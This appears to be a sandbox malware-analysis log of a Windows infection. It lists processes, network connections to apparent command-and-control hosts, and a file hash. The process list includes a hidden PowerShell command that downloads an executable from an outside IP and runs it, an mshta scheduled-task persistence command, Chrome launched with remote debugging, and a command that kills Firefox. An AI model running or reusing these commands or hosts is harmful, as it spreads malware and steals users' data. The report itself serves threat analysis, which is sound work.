C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "LW2TumadFO1" /tr "mshta \"C:\Temp\FhzKbqCT0.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\FhzKbqCT0.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2668 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2676 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe

"C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1328 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1284,i,7477667443213596592,6875119467050595597,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1284,i,7477667443213596592,6875119467050595597,131072 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1212

C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe

"C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 608 -s 508

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778

C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe

"C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe"

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2216 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3472 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3608 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3748 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe

"C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Guest Profile"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2684 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2692 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2016 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe

"C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1200

C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe

"C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="System Profile"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1064 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2176 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3784 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe

"C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 dugong.ydns.eu udp
DE 38.180.229.217:80 dugong.ydns.eu tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 avx.medianewsonline.com udp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
DE 5.75.210.149:443 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.149:443 tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 104.21.9.123:443 moderzysics.top tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
DE 5.75.210.83:443 tcp
US 104.21.16.1:443 exarthynature.run tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
DE 5.75.210.83:443 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.112.1:443 croprojegies.run tcp
DE 5.75.210.83:443 tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
DE 5.75.210.83:443 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.83:443 tcp
DE 5.75.210.83:443 tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
DE 5.75.210.83:443 tcp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4086 towerbingobongoboom.com tcp
DE 5.75.210.83:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta

MD5 b5cd89679873d940b659a140ac71c421
SHA1 1bf3d9c2f1bc5cebb569a3a6c94a06aabe576b2a
SHA256 2ada2a969c213ed56c5b0863d24a115c12c3bdf9ad03dc6f56d6c6530b6987b3
